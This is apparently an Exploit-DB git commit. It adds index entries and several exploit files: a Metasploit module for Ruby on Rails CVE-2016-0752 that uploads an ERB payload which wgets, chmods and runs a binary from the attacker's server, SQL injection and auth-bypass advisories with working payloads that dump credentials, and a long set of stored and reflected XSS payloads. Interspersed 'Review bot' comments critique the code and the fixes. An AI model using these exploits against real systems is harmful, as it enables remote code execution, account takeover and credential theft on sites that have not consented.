DB: 2016-10-18

24 new exploits

Entrepreneur Job Portal Script - SQL Injection
Entrepreneur Job Portal Script 2.06 - SQL Injection
NETGATE Registry Cleaner build 16.0.205 - Unquoted Service Path Privilege Escalation

HP Client - Automation Command Injection / Remote Code Execution
HP Client 9.1/9.0/8.1/7.9 - Command Injection

NO-IP DUC v4.1.1 - Unquoted Service Path Privilege Escalation
NO-IP DUC 4.1.1 - Unquoted Service Path Privilege Escalation
Wondershare PDFelement 5.2.9 - Unquoted Service Path Privilege Escalation
Firefox 49.0.1 - Denial of Service
Graylog Collector 0.4.2 - Unquoted Service Path Privilege Escalation
NETGATE AMITI Antivirus build 23.0.305 - Unquoted Service Path Privilege Escalation
NETGATE Data Backup build 3.0.605 - Unquoted Service Path Privilege Escalation
Student Information System (SIS) 0.1 - Authentication Bypass
Web Based Alumni Tracking System 0.1 - SQL Injection
Simple Dynamic Web 0.1 - SQL Injection
Learning Management System 0.1 - Authentication Bypass
Fashion Shopping Cart 0.1 - SQL Injection
Health Record System 0.1 - Authentication Bypass
Windows x64 - WinExec() Shellcode (93 bytes)
Spy Emergency 23.0.205 - Unquoted Service Path Privilege Escalation
PHP Telephone Directory - Multiple Vulnerabilities
Subrion CMS 4.0.5 - Cross-Site Request Forgery Bypass / Persistent Cross-Site Scripting
PHP Image Database - Multiple Vulnerabilities
Simple Shopping Cart Application 0.1 - SQL Injection
PHP NEWS 1.3.0 - Cross-Site Request Forgery (Add Admin)
School Full CBT 0.1 - SQL Injection
PHP Business Directory - Multiple Vulnerabilities
Windows x86 - Keylogger Reverse UDP Shellcode (493 bytes)
Ruby on Rails - Dynamic Render File Upload Remote Code Execution
Microsoft Windows Diagnostics Hub - DLL Load Privilege Escalation (MS16-125)
This commit is contained in:
Offensive Security 2016-10-18 05:01:18 +00:00
parent 113ab3e40e
commit 558ab1fc67
26 changed files with 2247 additions and 4 deletions


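--- a/files.csv
+++ b/files.csv
@@ -36597,7 +36597,8 @@ id,file,description,date,author,platform,type,port
 40473,platforms/windows/local/40473.txt,"Comodo Chromodo Browser - Unquoted Service Path Privilege Escalation",2016-10-06,Th3GundY,windows,local,0
 40474,platforms/hardware/remote/40474.txt,"Exagate WEBPack Management System - Multiple Vulnerabilities",2016-10-06,"Halil Dalabasmaz",hardware,remote,0
 40475,platforms/php/webapps/40475.txt,"Simple PHP Blog 0.8.4 - Cross-Site Request Forgery (Add Admin)",2016-10-07,Besim,php,webapps,0
-40479,platforms/php/webapps/40479.txt,"Entrepreneur Job Portal Script - SQL Injection",2016-10-07,OoN_Boy,php,webapps,0
+40479,platforms/php/webapps/40479.txt,"Entrepreneur Job Portal Script 2.06 - SQL Injection",2016-10-07,OoN_Boy,php,webapps,0
+40539,platforms/windows/local/40539.txt,"NETGATE Registry Cleaner build 16.0.205 - Unquoted Service Path Privilege Escalation",2016-10-15,Amir.ght,windows,local,0
 40477,platforms/windows/local/40477.txt,"BlueStacks 2.5.55 - Unquoted Service Path Privilege Escalation",2016-10-07,Th3GundY,windows,local,0
 40478,platforms/windows/local/40478.txt,"Waves Audio Service - Unquoted Service Path Privilege Escalation",2016-10-07,"Ross Marks",windows,local,0
 40480,platforms/php/webapps/40480.txt,"miniblog 1.0.1 - Cross-Site Request Forgery (Add New Post)",2016-10-09,Besim,php,webapps,0
@@ -36611,7 +36612,7 @@ id,file,description,date,author,platform,type,port
 40488,platforms/linux/local/40488.txt,"Apache Tomcat 8/7/6 (RedHat-Based Distros) - Privilege Escalation",2016-10-10,"Dawid Golunski",linux,local,0
 40489,platforms/lin_x86-64/local/40489.txt,"Linux Kernel 4.6.2 (Ubuntu 16.04.1) - 'IP6T_SO_SET_REPLACE' Privilege Escalation",2016-10-10,"Qian Zhang",lin_x86-64,local,0
 40490,platforms/windows/local/40490.txt,"Zend Studio IDE 13.5.1 - Insecure File Permissions Privilege Escalation",2016-10-10,hyp3rlinx,windows,local,0
-40491,platforms/multiple/remote/40491.py,"HP Client - Automation Command Injection / Remote Code Execution",2016-10-10,SlidingWindow,multiple,remote,0
+40491,platforms/multiple/remote/40491.py,"HP Client 9.1/9.0/8.1/7.9 - Command Injection",2016-10-10,SlidingWindow,multiple,remote,0
 40492,platforms/php/webapps/40492.html,"Maian Weblog 4.0 - Cross-Site Request Forgery (Add New Post)",2016-10-10,Besim,php,webapps,0
 40493,platforms/php/webapps/40493.html,"Spacemarc News - Cross-Site Request Forgery (Add New Post)",2016-10-10,Besim,php,webapps,0
 40494,platforms/windows/local/40494.txt,"Minecraft Launcher 1.6.61 - Insecure File Permissions Privilege Escalation",2016-10-11,"Ross Marks",windows,local,0
@@ -36645,5 +36646,28 @@ id,file,description,date,author,platform,type,port
 40530,platforms/php/webapps/40530.txt,"JonhCMS 4.5.1 - SQL Injection",2016-10-13,Besim,php,webapps,0
 40531,platforms/php/webapps/40531.txt,"Simple Forum PHP 2.4 - SQL Injection",2016-10-14,"Ehsan Hosseini",php,webapps,0
 40532,platforms/php/webapps/40532.html,"Simple Forum PHP 2.4 - Cross-Site Request Forgery (Edit Options)",2016-10-14,"Ehsan Hosseini",php,webapps,0
-40533,platforms/windows/local/40533.txt,"NO-IP DUC v4.1.1 - Unquoted Service Path Privilege Escalation",2016-10-14,"Ehsan Hosseini",windows,local,0
+40533,platforms/windows/local/40533.txt,"NO-IP DUC 4.1.1 - Unquoted Service Path Privilege Escalation",2016-10-14,"Ehsan Hosseini",windows,local,0
 40534,platforms/php/webapps/40534.html,"YouTube Automated CMS 1.0.7 - Cross-Site Request Forgery / Persistent Cross-Site Scripting",2016-10-14,"Arbin Godar",php,webapps,0
+40535,platforms/windows/local/40535.txt,"Wondershare PDFelement 5.2.9 - Unquoted Service Path Privilege Escalation",2016-10-14,"Saeed Hasanzadeh",windows,local,0
+40536,platforms/windows/dos/40536.py,"Firefox 49.0.1 - Denial of Service",2016-10-14,"sultan albalawi",windows,dos,0
+40538,platforms/windows/local/40538.txt,"Graylog Collector 0.4.2 - Unquoted Service Path Privilege Escalation",2016-10-14,"Joey Lane",windows,local,0
+40540,platforms/windows/local/40540.txt,"NETGATE AMITI Antivirus build 23.0.305 - Unquoted Service Path Privilege Escalation",2016-10-15,Amir.ght,windows,local,0
+40541,platforms/windows/local/40541.txt,"NETGATE Data Backup build 3.0.605 - Unquoted Service Path Privilege Escalation",2016-10-15,Amir.ght,windows,local,0
+40542,platforms/php/webapps/40542.txt,"Student Information System (SIS) 0.1 - Authentication Bypass",2016-10-14,lahilote,php,webapps,0
+40543,platforms/php/webapps/40543.txt,"Web Based Alumni Tracking System 0.1 - SQL Injection",2016-10-14,lahilote,php,webapps,0
+40544,platforms/php/webapps/40544.txt,"Simple Dynamic Web 0.1 - SQL Injection",2016-10-14,lahilote,php,webapps,0
+40545,platforms/php/webapps/40545.txt,"Learning Management System 0.1 - Authentication Bypass",2016-10-14,lahilote,php,webapps,0
+40546,platforms/php/webapps/40546.txt,"Fashion Shopping Cart 0.1 - SQL Injection",2016-10-14,lahilote,php,webapps,0
+40547,platforms/php/webapps/40547.txt,"Health Record System 0.1 - Authentication Bypass",2016-10-14,lahilote,php,webapps,0
+40549,platforms/win_x86-64/shellcode/40549.c,"Windows x64 - WinExec() Shellcode (93 bytes)",2016-10-17,"Roziul Hasan Khan Shifat",win_x86-64,shellcode,0
+40550,platforms/windows/local/40550.txt,"Spy Emergency 23.0.205 - Unquoted Service Path Privilege Escalation",2016-10-17,Amir.ght,windows,local,0
+40552,platforms/php/webapps/40552.txt,"PHP Telephone Directory - Multiple Vulnerabilities",2016-10-16,larrycompress,php,webapps,0
+40553,platforms/php/webapps/40553.txt,"Subrion CMS 4.0.5 - Cross-Site Request Forgery Bypass / Persistent Cross-Site Scripting",2016-10-17,"Ahsan Tahir",php,webapps,80
+40554,platforms/php/webapps/40554.txt,"PHP Image Database - Multiple Vulnerabilities",2016-10-16,larrycompress,php,webapps,0
+40555,platforms/php/webapps/40555.txt,"Simple Shopping Cart Application 0.1 - SQL Injection",2016-10-14,lahilote,php,webapps,0
+40557,platforms/php/webapps/40557.html,"PHP NEWS 1.3.0 - Cross-Site Request Forgery (Add Admin)",2016-10-16,"Meryem AKDOĞAN",php,webapps,0
+40558,platforms/php/webapps/40558.txt,"School Full CBT 0.1 - SQL Injection",2016-10-14,lahilote,php,webapps,0
+40559,platforms/php/webapps/40559.txt,"PHP Business Directory - Multiple Vulnerabilities",2016-10-17,larrycompress,php,webapps,0
+40560,platforms/win_x86/shellcode/40560.asm,"Windows x86 - Keylogger Reverse UDP Shellcode (493 bytes)",2016-10-17,Fugu,win_x86,shellcode,0
+40561,platforms/multiple/remote/40561.rb,"Ruby on Rails - Dynamic Render File Upload Remote Code Execution",2016-10-17,Metasploit,multiple,remote,0
+40562,platforms/windows/local/40562.cpp,"Microsoft Windows Diagnostics Hub - DLL Load Privilege Escalation (MS16-125)",2016-10-17,"Google Security Research",windows,local,0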



@ -0,0 +1,200 @@
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HttpServer
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Ruby on Rails Dynamic Render File Upload Remote Code Execution',
'Description' => %q{
This module exploits a remote code execution vulnerability in the explicit render
method when leveraging user parameters.
This module has been tested across multiple versions of Ruby on Rails.
The technique used by this module requires the specified
endpoint to be using dynamic render paths, such as the following example:
def show
render params[:id]
end
Also, the vulnerable target will need a POST endpoint for the TempFile upload, this
can literally be any endpoint. This module doesnt use the log inclusion method of
exploitation due to it not being universal enough. Instead, a new code injection
technique was found and used whereby an attacker can upload temporary image files
against any POST endpoint and use them for the inclusion attack. Finally, you only
get one shot at this if you are testing with the builtin rails server, use caution.
},
'Author' =>
[
'mr_me <mr_me@offensive-security.com>', # necromanced old bug & discovered new vector rce vector
'John Poulin (forced-request)' # original render bug finder
],
'References' =>
[
[ 'CVE', '2016-0752'],
[ 'URL', 'https://groups.google.com/forum/#!topic/rubyonrails-security/335P1DcLG00'], # rails patch
[ 'URL', 'https://nvisium.com/blog/2016/01/26/rails-dynamic-render-to-rce-cve-2016-0752/'], # John Poulin CVE-2016-0752 patched in 5.0.0.beta1.1 - January 25, 2016
[ 'URL', 'https://gist.github.com/forced-request/5158759a6418e6376afb'], # John's original exploit
],
'License' => MSF_LICENSE,
'Platform' => ['linux', 'bsd'],
'Arch' => ARCH_X86,
'Payload' =>
{
'DisableNops' => true,
},
'Privileged' => false,
'Targets' =>
[
[ 'Ruby on Rails 4.0.8 July 2, 2014', {} ] # Other versions are also affected
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Oct 16 2016'))
register_options(
[
Opt::RPORT(3000),
OptString.new('URIPATH', [ true, 'The path to the vulnerable route', "/users"]),
OptPort.new('SRVPORT', [ true, 'The daemon port to listen on', 1337 ]),
], self.class)
end
def check
# this is the check for the dev environment
res = send_request_cgi({
'uri' => normalize_uri(datastore['URIPATH'], "%2f"),
'method' => 'GET',
}, 60)
# if the page controller is dynamically rendering, its for sure vuln
if res and res.body =~ /render params/
return CheckCode::Vulnerable
end
# this is the check for the prod environment
res = send_request_cgi({
'uri' => normalize_uri(datastore['URIPATH'], "%2fproc%2fself%2fcomm"),
'method' => 'GET',
}, 60)
# if we can read files, its likley we can execute code
if res and res.body =~ /ruby/
return CheckCode::Appears
end
return CheckCode::Safe
end
def on_request_uri(cli, request)
if (not @pl)
print_error("#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!")
return
end
print_status("#{rhost}:#{rport} - Sending the payload to the server...")
@elf_sent = true
send_response(cli, @pl)
end
def send_payload
@bd = rand_text_alpha(8+rand(8))
fn = rand_text_alpha(8+rand(8))
un = rand_text_alpha(8+rand(8))
pn = rand_text_alpha(8+rand(8))
register_file_for_cleanup("/tmp/#{@bd}")
cmd = "wget #{@service_url} -O /tmp/#{@bd};"
cmd << "chmod 755 /tmp/#{@bd};"
cmd << "/tmp/#{@bd}"
pay = "<%=`#{cmd}`%>"
print_status("uploading image...")
data = Rex::MIME::Message.new
data.add_part(pay, nil, nil, 'form-data; name="#{un}"; filename="#{fn}.gif"')
res = send_request_cgi({
'method' => 'POST',
'cookie' => @cookie,
'uri' => normalize_uri(datastore['URIPATH'], pn),
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => data.to_s
})
if res and res.code == 422 and res.body =~ /Tempfile:\/(.*)>/
@path = "#{$1}" if res.body =~ /Tempfile:\/(.*)>/
return true
else
# this is where we pull the log file
if leak_log
return true
end
end
return false
end
def leak_log
# path to the log /proc/self/fd/7
# this bypasses the extension check
res = send_request_cgi({
'uri' => normalize_uri(datastore['URIPATH'], "proc%2fself%2ffd%2f7"),
'method' => 'GET',
}, 60)
if res and res.code == 200 and res.body =~ /Tempfile:\/(.*)>, @original_filename=/
@path = "#{$1}" if res.body =~ /Tempfile:\/(.*)>, @original_filename=/
return true
end
return false
end
def start_http_server
@pl = generate_payload_exe
@elf_sent = false
downfile = rand_text_alpha(8+rand(8))
resource_uri = '/' + downfile
if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::")
srv_host = datastore['URIHOST'] || Rex::Socket.source_address(rhost)
else
srv_host = datastore['SRVHOST']
end
# do not use SSL for the attacking web server
if datastore['SSL']
ssl_restore = true
datastore['SSL'] = false
end
@service_url = "http://#{srv_host}:#{datastore['SRVPORT']}#{resource_uri}"
service_url_payload = srv_host + resource_uri
print_status("#{rhost}:#{rport} - Starting up our web service on #{@service_url} ...")
start_service({'Uri' => {
'Proc' => Proc.new { |cli, req|
on_request_uri(cli, req)
},
'Path' => resource_uri
}})
datastore['SSL'] = true if ssl_restore
connect
end
def render_tmpfile
@path.gsub!(/\//, '%2f')
res = send_request_cgi({
'uri' => normalize_uri(datastore['URIPATH'], @path),
'method' => 'GET',
}, 1)
end
def exploit
print_status("Sending initial request to detect exploitability")
start_http_server
if send_payload
print_good("injected payload")
render_tmpfile
# we need to delay, for the stager
select(nil, nil, nil, 5)
end
end
end
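Review bot: The content-disposition passed to `data.add_part` in `send_payload` is a single-quoted Ruby string, so `#{un}` and `#{fn}` are never interpolated — the upload goes out with the literal field name `#{un}` and filename `#{fn}.gif`, and the two random names generated just above it are dead. Use a double-quoted string: `data.add_part(pay, nil, nil, "form-data; name=\"#{un}\"; filename=\"#{fn}.gif\"")`. In the same request `'cookie' => @cookie` reads an instance variable that is never assigned anywhere in the module, so the header is always nil; either drop it or expose a COOKIE option. `leak_log` also hardcodes `/proc/self/fd/7` as the Rails log descriptor, which is an assumption about the target process's fd layout that the module description should state, and `render_tmpfile` discards its response and uses a 1-second timeout, so a failed inclusion is never reported before the fixed 5-second wait in `exploit`.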


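--- a/platforms/php/webapps/40479.txt
+++ b/platforms/php/webapps/40479.txt
@@ -3,7 +3,6 @@
 | Software : Entrepreneur Job Portal Script
 | Version : 2.06
 | Vendor : http://www.i-netsolution.com/
-| Demo : http://www.i-netsolution.com/item/entrepreneur-job-portal-script/live_demo/853208
 | Date : 07 October 2016
 | Author : OoN_Boy
 [x]========================================================================================================================================[x]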

platforms/php/webapps/40542.txt Executable file

@ -0,0 +1,68 @@
# Exploit Title............... Student Information System (SIS) Auth Bypass
# Google Dork................. N/A
# Date........................ 14/10/2016
# Exploit Author.............. lahilote
# Vendor Homepage............. http://www.sourcecodester.com/php/10902/student-information-system-sis.html
# Software Link............... http://www.sourcecodester.com/sites/default/files/download/Bwire%20Charles/ucc.zip
# Version..................... 0.1
# Tested on................... xampp
# CVE......................... N/A
The audit_list in ucc/admin_login.php
-------------------------------------
----snip----
error_reporting(E_ALL ^ E_DEPRECATED);
if(isset($_POST['submit'])) {
include 'database_config2.php';
$myusername = $_POST['username'];
$mypassword = $_POST['password'];
$query = "SELECT * FROM adminstrator WHERE USERNAME='$myusername' and PASSWORD='$mypassword'";
$result = mysql_query($query);
$count = mysql_num_rows($result);
mysql_close();
----snip----
You can login with username and password: admin' or '1'='1
How to fix
----------
One of the method's to fix and secure such Auth Bypass flaw's, is to use the php function mysql_real_escape_string.
It causes that every of this characters \x00, \n, \r, \, '
get's replaced with a simple Backslash „/“, so the attackers commands become useless.
Example:
error_reporting(E_ALL ^ E_DEPRECATED);
if(isset($_POST['submit'])) {
include 'database_config2.php';
$myusername = mysql_real_escape_string($_POST['username']);
$mypassword = mysql_real_escape_string($_POST['password']);
$query = "SELECT * FROM adminstrator WHERE USERNAME='$myusername' and PASSWORD='$mypassword'";
$result = mysql_query($query);
$count = mysql_num_rows($result);
mysql_close();
Credits
-------
This vulnerability was discovered and researched by lahilote
References
----------
http://www.sourcecodester.com/php/10902/student-information-system-sis.html
http://php.net/manual/en/function.mysql-real-escape-string.php
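Review bot: The "How to fix" section recommends a weaker remedy than the advisory should: mysql_real_escape_string() prefixes the listed characters with a backslash rather than replacing them (and the text shows a forward slash `„/“`), it keeps the deprecated mysql_* extension that the snippet's `error_reporting(E_ALL ^ E_DEPRECATED)` line appears to be masking, and it does nothing about `PASSWORD='$mypassword'` comparing the submitted password against the stored column in the clear. Suggest recommending a prepared statement instead, e.g. `$stmt = $db->prepare("SELECT * FROM adminstrator WHERE USERNAME=? AND PASSWORD=?"); $stmt->bind_param('ss', $myusername, $mypassword); $stmt->execute();`, together with password_hash()/password_verify() in place of the literal comparison. "Tested on xampp" should also name the PHP version, since mysql_* is unavailable from PHP 7 onward and that affects whether the proposed fix can even run.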

platforms/php/webapps/40543.txt Executable file

@ -0,0 +1,68 @@
# Exploit Title.............. Web Based Alumni Tracking System Multiple Vulnerability
# Google Dork................ N/A
# Date....................... 14/10/2016
# Exploit Author............. lahilote
# Vendor Homepage............ http://www.sourcecodester.com/php/10832/web-based-alumni-tracking-system.html
# Software Link.............. http://www.sourcecodester.com/sites/default/files/download/John%20Mark%20Ulep/web-based_alumni_tracking_system.zip
# Version.................... 0.1
# Tested on.................. xampp
# CVE........................ N/A
The audit_list in /admin/print_employed.php
-------------------------------
----snip----
48 <?php $get_id = $_GET['id'];?>
----snip----
/admin/index.php
----------------
----snip----
$user = $_POST['username'];
$password = $_POST['password'];
$myquery = mysql_query("select * from user where username = '$user' and password = '$password'")or die(mysql_error());
----snip----
Example exploitation
--------------------
http://server/path_to_webapp/admin/print_employed.php?id=-2%27%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12%20from%20user--+
http://server/path_to_webapp/admin/index.php
Login with username and password: admin' or '1'='1
How to fix
----------
Simple method's use the php function intval and mysql_real_escape_string.
Example: /admin/print_employed.php
48 <?php $get_id = intval($_GET['id']);?>
Example: /admin/index.php
$user = mysql_real_escape_string($_POST['username']);
$password = mysql_real_escape_string($_POST['password']);
$myquery = mysql_query("select * from user where username = '$user' and password = '$password'")or die(mysql_error());
Credits
-------
This vulnerability was discovered and researched by lahilote
References
----------
http://www.sourcecodester.com/php/10832/web-based-alumni-tracking-system.html
http://php.net/manual/en/function.intval.php
http://php.net/manual/en/function.mysql-real-escape-string.php
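Review bot: The union PoC against print_employed.php pulls `concat(username,0x3a,password)` and the index.php query compares the submitted password directly against the `password` column, so the dumped credentials appear to be usable as-is; the fix section should therefore also recommend password_hash()/password_verify(), because escaping alone leaves every extracted password in the clear. Both fixed snippets keep `or die(mysql_error())`, which prints the DBMS error text to the client and is what makes column-count and error-based probing cheap — recommend logging server-side and returning a generic message. The advisory also does not say whether /admin/print_employed.php is reachable without an admin session; the PoC URL carries no cookie, so state explicitly whether the injection is pre- or post-authentication.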

platforms/php/webapps/40544.txt Executable file

@ -0,0 +1,55 @@
# Exploit Title.............. Simple Dynamic Web SQL Injection
# Google Dork................ N/A
# Date....................... 14/10/2016
# Exploit Author............. lahilote
# Vendor Homepage............ http://www.sourcecodester.com/php/10888/simple-dynamic-web-site.html
# Software Link.............. http://www.sourcecodester.com/sites/default/files/download/Chinthaka%20Deshapriya/dynamic_web_page.zip
# Version.................... 0.1
# Tested on.................. xampp
# CVE........................ N/A
The audit_list in /page.php
----snip----
$prodID = $_GET['prodid'];
if(!empty($prodID)){
$sqlSelectSpecProd = mysql_query("select * from page where id = '$prodID'") or die(mysql_error());
$getProdInfo = mysql_fetch_array($sqlSelectSpecProd);
$ptitle = $getProdInfo["title"];
$pdes = $getProdInfo["description"];
$pimg = $getProdInfo["imgUrl"];
}
----snip----
Example exploitation
--------------------
http://server/path_to_webapp/page.php?prodid=-3%27%20union%20select%201,2,@@version,4--+
How to fix
----------
Simple method's use the php function intval.
For example
$prodID = intval($_GET['prodid']);
if(!empty($prodID)){
$sqlSelectSpecProd = mysql_query("select * from page where id = '$prodID'") or die(mysql_error());
$getProdInfo = mysql_fetch_array($sqlSelectSpecProd);
$ptitle = $getProdInfo["title"];
$pdes = $getProdInfo["description"];
$pimg = $getProdInfo["imgUrl"];
}
Credits
-------
This vulnerability was discovered and researched by lahilote
References
----------
http://www.sourcecodester.com/php/10888/simple-dynamic-web-site.html
http://php.net/manual/en/function.intval.php
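Review bot: `$prodID = intval($_GET['prodid']);` is a correct fix only if `page.id` is an integer column, which the advisory does not show; a bound parameter (`$stmt = $db->prepare("select * from page where id = ?"); $stmt->bind_param('i', $prodID);`) removes the injection regardless of column type and should be the primary recommendation, with intval() as defence in depth. The fixed snippet also keeps `or die(mysql_error())`, which leaks the exact SQL error to the browser and makes discovering the four columns used by the PoC's union trivial; recommend dropping the error echo. Note that intval() also changes the `!empty($prodID)` check — a non-numeric value now becomes 0 and skips the query entirely, which is fine here but worth a sentence so maintainers understand the behavioural change.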

platforms/php/webapps/40545.txt Executable file

@ -0,0 +1,85 @@
# Exploit Title.............. Learning Management System Auth Bypass
# Google Dork................ N/A
# Date....................... 14/10/2016
# Exploit Author............. lahilote
# Vendor Homepage............ http://www.sourcecodester.com/php/7339/learning-management-system.html
# Software Link.............. http://www.sourcecodester.com/sites/default/files/download/jkev/lms.zip
# Version.................... 0.1
# Tested on.................. xampp
# CVE........................ N/A
The audit_list in lms/login.php
-------------------------------
----snip----
$username = $_POST['username'];
$password = $_POST['password'];
/* student */
$query = "SELECT * FROM student WHERE username='$username' AND password='$password'";
$result = mysql_query($query)or die(mysql_error());
$row = mysql_fetch_array($result);
$num_row = mysql_num_rows($result);
/* teacher */
$query_teacher = mysql_query("SELECT * FROM teacher WHERE username='$username' AND password='$password'")or die(mysql_error());
$num_row_teacher = mysql_num_rows($query_teacher);
$row_teahcer = mysql_fetch_array($query_teacher);
if( $num_row > 0 ) {
----snip----
lms/admin/login.php
-------------------
----snip----
$username = $_POST['username'];
$password = $_POST['password'];
$query = mysql_query("SELECT * FROM users WHERE username='$username' AND password='$password'")or die(mysql_error());
$count = mysql_num_rows($query);
$row = mysql_fetch_array($query);
----snip----
You can login with username and password: admin' or '1'='1
How to fix
----------
One of the method's to fix and secure such Auth Bypass flaw's, is to use the php function mysql_real_escape_string.
It causes that every of this characters \x00, \n, \r, \, '
get's replaced with a simple Backslash „/“, so the attackers commands become useless.
Example: lms/login.php
$username = mysql_real_escape_string($_POST['username']);
$password = mysql_real_escape_string($_POST['password']);
/* student */
$query = "SELECT * FROM student WHERE username='$username' AND password='$password'";
$result = mysql_query($query)or die(mysql_error());
$row = mysql_fetch_array($result);
$num_row = mysql_num_rows($result);
/* teacher */
$query_teacher = mysql_query("SELECT * FROM teacher WHERE username='$username' AND password='$password'")or die(mysql_error());
$num_row_teacher = mysql_num_rows($query_teacher);
$row_teahcer = mysql_fetch_array($query_teacher);
if( $num_row > 0 ) {
Example: lms/admin/login.php
$username = mysql_real_escape_string($_POST['username']);
$password = mysql_real_escape_string($_POST['password']);
$query = mysql_query("SELECT * FROM users WHERE username='$username' AND password='$password'")or die(mysql_error());
$count = mysql_num_rows($query);
$row = mysql_fetch_array($query);
Credits
-------
This vulnerability was discovered and researched by lahilote
References
----------
http://www.sourcecodester.com/php/7339/learning-management-system.html
http://php.net/manual/en/function.mysql-real-escape-string.php
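Review bot: The proposed fix for lms/admin/login.php keeps `or die(mysql_error())`, so a failed query still prints the raw MySQL error to the browser; the remediation should remove that echo as well as escape the input. Both login pages compare the submitted password straight against the stored column (`password='$password'`), so the escaping fix leaves a plaintext-credential store in place — recommend parameterised queries with password_hash()/password_verify() rather than mysql_real_escape_string() on the deprecated mysql_* extension. lms/login.php also runs the student and teacher queries with the same unescaped input, so one request reaches two injection points; the snippet tests `$num_row > 0` for the student table first, so the bypass lands the attacker in whichever role that branch grants, which the advisory could state.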

platforms/php/webapps/40546.txt Executable file

@ -0,0 +1,45 @@
# Exploit Title.............. Fashion Shopping Cart SQL Injection
# Google Dork................ N/A
# Date....................... 14/10/2016
# Exploit Author............. lahilote
# Vendor Homepage............ http://www.sourcecodester.com/node/10435
# Software Link.............. http://www.sourcecodester.com/sites/default/files/download/aniketsmarty/online_shopping.zip
# Version.................... 0.1
# Tested on.................. xampp
# CVE........................ N/A
The audit_list in /admin/dd.php
-------------------------------
----snip----
$q=$_GET["q"];
$sql="SELECT * FROM subcategory WHERE cat_id ='$q'";
----snip----
Example exploitation
--------------------
http://server/path_to_webapp/admin/dd.php?q=-1%27%20union%20select%201,version()--+
How to fix
----------
Simple method's use the php function intval.
For example
$q=intval($_GET["q"]);
$sql="SELECT * FROM subcategory WHERE cat_id ='$q'";
Credits
-------
This vulnerability was discovered and researched by lahilote
References
----------
http://www.sourcecodester.com/node/10435
http://php.net/manual/en/function.intval.php
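Review bot: The advisory does not say whether /admin/dd.php is reachable without an authenticated admin session — the PoC URL carries no session cookie, so the reader cannot tell whether this is a pre-auth injection or an admin-only one, and the severity differs substantially; please state it. The `-1' union select 1,version()` probe shows a two-column result set but not the type of `subcategory.cat_id`, so intval() is only a correct fix if that column is numeric; a bound parameter (`$stmt->bind_param('i', $q)`) covers either case and is the safer recommendation.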

platforms/php/webapps/40547.txt Executable file

@ -0,0 +1,54 @@
# Exploit Title.............. Health Record System Auth Bypass
# Google Dork................ N/A
# Date....................... 14/10/2016
# Exploit Author............. lahilote
# Vendor Homepage............ http://www.sourcecodester.com/node/10430
# Software Link.............. http://www.sourcecodester.com/sites/default/files/download/Jesutoyeboluwatife/vital.zip
# Version.................... 0.1
# Tested on.................. xampp
# CVE........................ N/A
The audit_list in vital/signin.php
-------------------------------
----snip----
if (isset($_POST['submit'])){
$lga_id=$_POST['lgaid'];
$pw=$_POST['pwd'];
$_SESSION['username'] = $lga_id;
$sql=mysql_query("SELECT * FROM admin WHERE lga_id='$lga_id' AND password='$pw' ");
----snip----
You can login with username and password: admin' or '1'='1
How to fix
----------
One of the method's to fix and secure such Auth Bypass flaw's, is to use the php function mysql_real_escape_string.
It causes that every of this characters \x00, \n, \r, \, '
get's replaced with a simple Backslash „/“, so the attackers commands become useless.
Example:
if (isset($_POST['submit'])){
$lga_id=mysql_real_escape_string($_POST['lgaid']);
$pw=mysql_real_escape_string($_POST['pwd']);
$_SESSION['username'] = $lga_id;
$sql=mysql_query("SELECT * FROM admin WHERE lga_id='$lga_id' AND password='$pw' ");
Credits
-------
This vulnerability was discovered and researched by lahilote
References
----------
http://www.sourcecodester.com/node/10430
http://php.net/manual/en/function.mysql-real-escape-string.php
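Review bot: `$_SESSION['username'] = $lga_id;` is assigned from the raw POST field before the query result is examined, and the proposed fix keeps that ordering, so the session is populated with the attacker-supplied identifier whether or not authentication succeeds. Move the assignment after a successful row check, e.g. `if (mysql_num_rows($sql) === 1) { $_SESSION['username'] = $lga_id; }`, and preferably take the value from the returned row rather than the request. The remediation should also prefer a prepared statement with password_hash()/password_verify() over mysql_real_escape_string() on a plaintext `password='$pw'` comparison; whether the login regenerates the session id afterwards cannot be seen in the snippet, so the advisory should mention session_regenerate_id() as part of the fix.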

platforms/php/webapps/40552.txt Executable file

@ -0,0 +1,103 @@
# Exploit Title: PHP Telephone Directory - Multiple Vulnerabilities
# Date: 2016-10-16
# Exploit Author: larrycompress
# Contact: larrycompress@gmail.com
# Type: webapps
# Platform: PHP
# Vendor Homepage: http://www.pagereactions.com/product.php?pku=2
# Software Link: http://www.pagereactions.com/downloads/phptelephonedirectory.zip
---------------------------------------------------------------------------------
POC as follows :
# 0x00 Reflected XSS
---
1.In public search :
http://192.168.1.112/phptelephonedirectory/index.php?key=<svg/onload=alert(1)>
2.In administration web interface (need normal user login) :
http://192.168.1.112/phptelephonedirectory/administration.php?key=<svg/onload=alert(1)>
# 0x01 Stored XSS
---
1.In administration web directory interface (need normal user login) :
http://192.168.1.112/phptelephonedirectory/administration.php
?pageaction=newcontact
&subaction=submit
&id=1
&dtDOBDate=0000-00-00
&pointcode=<script>alert(1)/*
&contacttitle=*/</script>
&firstname=<script>alert(2)</script>
&lastname=<script>alert(3)</script>
&middlename=<script>alert(4)</script>
&DOBdateradio=usenew
&dateday=16
&datemonthnewedit=10
&dateyearnewedit=2015
&employeeID=<script>alert(5)/*
&otherID=*/</script>
&phonenumber1=<script>alert(6)</script>
&internalphonenumber=<script>alert(7)</script>
&phonenumber2=<script>alert(8)</script>
&phonenumber3=<script>alert(9)</script>
&fax=<script>alert(10)</script>
&mobilecell=<script>alert(11)</script>
&email=<script>alert(12)</script>
&alternateemail=<script>alert(13)</script>
&chat=<script>alert(14)</script>
&website=<script>alert(15)</script>
&socialmedia1=<script>alert(16)</script>
&socialmedia2=<script>alert(17)</script>
&socialmedia3=<script>alert(18)</script>
&contactposition=<script>alert(19)</script>
&company=<script>alert(20)</script>
&qualifications=<script>alert(21)</script>
&departmentnewedit=
&buildingroom=<script>alert(22)</script>
&address=<script>alert(23)</script>
&city=<script>alert(24)</script>
&suburb=<script>alert(25)</script>
&tdstate=<script>alert(26)</script>
&zippostcode=<script>alert(27)/*
&country=*/</script><script>alert(28)</script>
&description=<script>alert(29)</script>
&recordstatus=active
